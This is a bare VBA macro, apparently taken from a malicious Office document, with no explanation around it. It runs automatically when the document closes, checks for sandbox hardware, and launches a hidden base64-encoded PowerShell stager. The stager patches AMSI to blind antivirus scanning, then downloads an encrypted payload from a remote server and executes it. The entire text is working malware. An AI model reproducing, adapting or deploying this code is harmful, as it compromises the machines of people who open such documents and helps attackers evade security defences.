Sub AutoClose()
	jBXssuSsRbeGZ
End Sub

Public Function jBXssuSsRbeGZ() As Variant
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
	Set ID = objWMIService.ExecQuery("Select IdentifyingNumber from Win32_ComputerSystemproduct")
	For Each objItem In ID
		If StrComp(objItem.IdentifyingNumber, "2UA20511KN") = 0 Then End
	Next
	Set disksize = objWMIService.ExecQuery("Select Size from Win32_logicaldisk")
	For Each objItem In disksize
		If (objItem.Size = 42949603328#) Then End
		If (objItem.Size = 68719443968#) Then End
	Next
	Dim BvOvsahuuuKzpAWWmc As String
	BvOvsahuuuKzpAWWmc = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABpAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQA7ACQAUgBlAGYA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "IAA9ACAAKAAiAFMAeQBzAHQAZQBtACwAIABWAGUAcgBzAGkAbw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BuAD0ANAAuADAALgAwAC4AMAAsACAAQwB1AGwAdAB1AHIAZQA9"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AG4AZQB1AHQAcgBhAGwALAAgAFAAdQBiAGwAaQBjAEsAZQB5AF"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QAbwBrAGUAbgA9AGIANwA3AGEANQBjADUANgAxADkAMwA0AGUA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "MAA4ADkAIgAsACIAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALAAg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AFYAZQByAHMAaQBvAG4APQA0AC4AMAAuADAALgAwACwAIABDAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "UAbAB0AHUAcgBlAD0AbgBlAHUAdAByAGEAbAAsACAAUAB1AGIA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "bABpAGMASwBlAHkAVABvAGsAZQBuAD0AYgAwADMAZgA1AGYANw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BmADEAMQBkADUAMABhADMAYQAiACkAOwAkAFMAbwB1AHIAYwBl"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ACAAPQAgACIAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwB1AH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "MAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "LgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AG4AYQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BtAGUAcwBwAGEAYwBlACAAQgB5AHAAYQBzAHMAewBwAHUAYgBs"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AGkAYwAgAGMAbABhAHMAcwAgAEEATQBTAEkAJABpAGQAewBbAE"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QAbABsAEkAbQBwAG8AcgB0ACgAYAAiAGsAZQByAG4AZQBsADMA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "MgBgACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUABy"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "TgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoAGAAIg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BrAGUAcgBuAGUAbAAzADIAYAAiACkAXQBwAHUAYgBsAGkAYwAg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QAcgAgAEwAbwBhAGQATABpAGIAcgBhAHIAeQAoAHMAdAByAGkA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "bgBnACAAbgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AoAGAAIgBrAGUAcgBuAGUAbAAzADIAYAAiACkAXQBwAHUAYgBs"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "8AbwBsACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "SQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAVQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BJAG4AdABQAHQAcgAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ACAAZgBsAE4AZQB3AFAAcgBvAHQAZQBjAHQALAAgAG8AdQB0AC"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AAdQBpAG4AdAAgAGwAcABmAGwATwBsAGQAUAByAG8AdABlAGMA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "dAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoAGAAIgBLAGUAcg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BuAGUAbAAzADIALgBkAGwAbABgACIALAAgAEUAbgB0AHIAeQBQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AG8AaQBuAHQAIAA9ACAAYAAiAFIAdABsAE0AbwB2AGUATQBlAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "0AbwByAHkAYAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8A"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "cgAgAD0AIABmAGEAbABzAGUAKQBdAHMAdABhAHQAaQBjACAAZQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "B4AHQAZQByAG4AIAB2AG8AaQBkACAATQBvAHYAZQBNAGUAbQBv"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHIAeQAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAASQBuAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QAUAB0AHIAIABzAHIAYwAsACAAaQBuAHQAIABzAGkAegBlACkA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "OwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAaQBuAHQAIA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BEAGkAcwBhAGIAbABlACgAKQB7AEkAbgB0AFAAdAByACAAVABh"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHIAZwBlAHQARABMAEwAIAA9ACAATABvAGEAZABMAGkAYgByAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "EAcgB5ACgAYAAiAGEAbQBzAGkALgBkAGwAbABgACIAKQA7AGkA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ZgAgACgAVABhAHIAZwBlAHQARABMAEwAIAA9AD0AIABJAG4AdA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BQAHQAcgAuAFoAZQByAG8AKQAgAHsAIAByAGUAdAB1AHIAbgAg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ADEAOwAgAH0ASQBuAHQAUAB0AHIAIABBAFMAQgBQAHQAcgAgAD"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "0AIABHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABUAGEA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "cgBnAGUAdABEAEwATAAsACAAYAAiAEEAbQBzAGkAYAAiACAAKw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AgAGAAIgBTAGMAYQBuAGAAIgAgACsAIABgACIAQgB1AGYAZgBl"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHIAYAAiACkAOwBpAGYAIAAoAEEAUwBCAFAAdAByACAAPQA9AC"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AASQBuAHQAUAB0AHIALgBaAGUAcgBvACkAIAB7ACAAcgBlAHQA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "dQByAG4AIAAxADsAIAB9AFUASQBuAHQAUAB0AHIAIABkAHcAUw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BpAHoAZQAgAD0AIAAoAFUASQBuAHQAUAB0AHIAKQA1ADsAdQBp"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AG4AdAAgAFoAZQByAG8AIAA9ACAAMAA7AGkAZgAgACgAIQBWAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "kAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABBAFMAQgBQAHQA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "cgAsACAAZAB3AFMAaQB6AGUALAAgADAAeAA0ADAALAAgAG8AdQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "B0ACAAWgBlAHIAbwApACkAIAB7ACAAcgBlAHQAdQByAG4AIAAx"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ADsAIAB9AEIAeQB0AGUAWwBdACAAUABhAHQAYwBoACAAPQAgAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "sAIAAwAHgAQgA4ACwAIAAwAHgANQA3ACwAIAAwAHgAMAAwACwA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "IAAwAHgAMAA3ACwAIAAwAHgAOAAwACwAIAAwAHgAQwAzACAAfQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "A7AEkAbgB0AFAAdAByACAAdQBuAG0AYQBuAGEAZwBlAGQAUABv"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AGkAbgB0AGUAcgAgAD0AIABNAGEAcgBzAGgAYQBsAC4AQQBsAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "wAbwBjAEgARwBsAG8AYgBhAGwAKAA2ACkAOwBNAGEAcgBzAGgA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "YQBsAC4AQwBvAHAAeQAoAFAAYQB0AGMAaAAsACAAMAAsACAAdQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BuAG0AYQBuAGEAZwBlAGQAUABvAGkAbgB0AGUAcgAsACAANgAp"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ADsATQBvAHYAZQBNAGUAbQBvAHIAeQAoAEEAUwBCAFAAdAByAC"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "wAIAB1AG4AbQBhAG4AYQBnAGUAZABQAG8AaQBuAHQAZQByACwA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "IAA2ACkAOwByAGUAdAB1AHIAbgAgADAAOwB9AH0AfQAiADsAQQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BkAGQALQBUAHkAcABlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBk"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AEEAcwBzAGUAbQBiAGwAaQBlAHMAIAAkAFIAZQBmACAALQBUAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "kAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAbwB1AHIA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "YwBlACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "A7AGkAZQB4ACAAIgBbAEIAeQBwAGEAcwBzAC4AQQBNAFMASQAk"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AGkAZABdADoAOgBEAGkAcwBhAGIAbABlACgAKQAgAHwAIABPAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "UAdAAtAE4AdQBsAGwAIgA7AH0AOwBbAFMAeQBzAHQAZQBtAC4A"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "TgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BhAGcAZQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMAbwBu"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHQAaQBuAHUAZQA9ADAAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAdgBWAF4AWQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "A6AEYAdABmAEMAWABUACwAPQBhAEEATQA/AGoAIwA3AE8AUQBw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AF0AJgByAHwAWwBaAHgAbgAnACkAOwAkAFIAPQB7ACQARAAsAC"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "MAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABd"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "fAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "A9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABT"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdAC"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "wAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "JABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "B9AH0AOwAkAHcAYwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABT"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "QAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8A"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "B0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgBy"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAE"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "IAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "RABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BNAGcAQQB4AEEAQwA0AEEATQBRAEEAeQBBAEQAZwBBAE8AZwBB"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAHcAcAAtAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "MAbwBuAHQAZQBuAHQALwB0AGgAZQBtAGUAcwAvAHcAcAAtAGYA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "cgBvAG4AdAAuAHAAaABwACcAOwAkAHcAYwAuAFAAcgBvAHgAeQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "A9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBx"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "IAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATg"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBd"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "UAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "cgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQAdw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBVAHMAZQBy"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AC0AQQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA1AC"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzADsA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "IABXAGkAbgA2ADQAOwAgAHgANgA0ACkAIABBAHAAcABsAGUAVw"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BlAGIASwBpAHQALwA1ADMANwAuADMANgAgACgASwBIAFQATQBM"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ACwAIABsAGkAawBlACAARwBlAGMAawBvACkAIABDAGgAcgBvAG"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "0AZQAvADcAOQAuADAALgAzADkANAA1AC4AOAA4ACAAUwBhAGYA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "YQByAGkALwA1ADMANwAuADMANgAiACkAOwB0AHIAeQB7ACQAaQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BnAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAo"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "ACQAcwBlAHIAKQB9AGMAYQB0AGMAaAB7AH0AOwAkAHcAYwAuAE"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "gAZQBhAGQAZQByAHMALgBBAGQAZAAoACIASABvAHMAdAAiACwA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "IgB3AG0AdwBpAGYAYgBhAGoAeAB4AGIAYwB4AG0AdQBjAHgAbQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BsAGMALgBjAG8AbQAiACkAOwAkAHcAYwAuAEgAZQBhAGQAZQBy"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "MAcwBpAG8AbgA9AHMAaQBIAC8ATABaAE8AWABiAG8AVABnAGIA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "SwByADgAUQAlADIAQgBaAFIARQBhAEIAcwBqAFcAbwAlADMARA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABv"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAH"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "YAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEA"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "PQAkAGQAYQB0AGEAWwA0AC4ALgAoACQAZABhAHQAYQAuAGwAZQ"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "BuAGcAdABoAC0AMQApAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQBy"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "AFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAF"
	BvOvsahuuuKzpAWWmc = BvOvsahuuuKzpAWWmc + "YAKwAkAEsAKQApAHwASQBFAFgA"
	Set asd = CreateObject("WScript.Shell")
	asd.Run(BvOvsahuuuKzpAWWmc)
End Function
